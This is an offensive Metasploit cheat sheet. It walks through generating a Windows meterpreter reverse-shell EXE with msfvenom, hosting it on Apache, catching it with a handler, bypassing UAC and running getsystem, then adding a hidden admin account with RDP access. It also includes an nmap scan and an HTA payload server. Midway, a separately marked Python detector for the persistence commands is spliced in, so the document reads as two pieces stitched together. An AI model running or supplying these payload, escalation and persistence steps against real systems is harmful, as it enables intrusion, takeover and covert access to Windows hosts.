MSF Venom

This document outlines steps to generate a Metasploit payload, set up a handler, escalate privileges on a Windows system, establish persistence, and serve a payload through an HTA server. It includes using msfvenom to generate an EXE payload, running msfconsole to handle the payload, using an exploit to gain administrator access, adding a new user and enabling RDP for persistence, and running an HTA server through Metasploit to serve a payload to targets.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe

sudo apt-get install shellter

msfconsole

use multi/handler

set payload windows/meterpreter/reverse_tcp

run or exploit

cp something32.exe /var/www/html

service apache2 start

privilege escalation:

background

use exploit/windows/local/bypassuac_comhijack

set SESSION 2

set payload windows/x64/meterpreter/reverse_tcp

run or exploit

getsystem

persistence:

shell

C:\WINDOWS\system32

net user /add jaime Bru73f0rc3_

net localgroup administrators jaime /add

net localgroup "Remote Desktop Users" jaime /add

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

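From the defender's side, the persistence commands above leave a recognisable trail in process-creation logs (command lines from Security event 4688 or Sysmon event 1). The following is an added example, not part of the original document: a small correlator that flags a host where account creation, a privileged group add and the fDenyTSConnections change fall within one time window. The event tuples, host names, user names and the functions tag and detect are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# One rule per persistence step listed above; matched against process command lines.
RULES = {
    "account_created": re.compile(r'\bnet1?(\.exe)?\s+user\b.*\s/add\b', re.I),
    "priv_group_add": re.compile(
        r'\bnet1?(\.exe)?\s+localgroup\s+"?(administrators|remote desktop users)"?\s.*/add\b',
        re.I),
    "rdp_enabled": re.compile(
        r'\breg(\.exe)?\s+add\b.*terminal server.*fDenyTSConnections.*/d\s+0\b', re.I),
}

# Constructed sample events: (ISO timestamp, host, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("2024-05-01T10:02:11", "WS-014", 'net user /add labuser1 Example-Passw0rd'),
    ("2024-05-01T10:02:40", "WS-014", 'net localgroup administrators labuser1 /add'),
    ("2024-05-01T10:03:05", "WS-014", 'net localgroup "Remote Desktop Users" labuser1 /add'),
    ("2024-05-01T10:03:30", "WS-014",
     r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"'
     r' /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("2024-05-01T11:15:00", "WS-022", 'net user helpdesk2 Example-Passw0rd /add'),
    ("2024-05-01T11:20:00", "WS-031", 'net user'),  # plain enumeration, no rule matches
]

def tag(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def detect(events, window=timedelta(minutes=15)):
    """Map host -> (severity, tags); 'high' means all three steps fell in one window."""
    hits = {}
    for ts, host, cmd in events:
        for name in tag(cmd):
            hits.setdefault(host, []).append((datetime.fromisoformat(ts), name))
    alerts = {}
    for host, seen in hits.items():
        seen.sort()
        # Largest set of distinct rule names inside any window that starts at a hit.
        best = max(({n for when, n in seen if start <= when <= start + window}
                    for start, _ in seen), key=len)
        alerts[host] = ("high" if len(best) == len(RULES) else "medium", sorted(best))
    return alerts

if __name__ == "__main__":
    for host, (severity, tags) in detect(SAMPLE_EVENTS).items():
        print(host, severity, tags)
```

A single matching command is reported as medium because help-desk account creation is routine on many networks; the correlated sequence is what separates this procedure from ordinary administration.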
nmap -sV -O IP or nmap -p- IP

msfconsole
use windows/misc/hta_server
show options
set SRVHOST
set URIPATH
set target
exploit or run
sessions
sessions -i 1
help or shell
